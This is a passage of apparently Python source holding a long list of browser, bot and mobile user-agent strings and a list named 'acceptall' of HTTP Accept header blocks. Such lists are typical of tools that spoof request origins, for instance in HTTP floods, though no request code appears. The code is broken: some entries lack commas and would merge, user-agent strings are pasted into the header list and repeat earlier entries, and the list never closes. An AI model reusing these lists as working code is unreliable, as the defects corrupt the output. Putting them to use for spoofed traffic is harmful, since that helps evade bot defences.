"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
"msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0"]
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1","Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1","Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5","Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20","Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a","Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2","Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0","Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1","Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2","Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0","Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
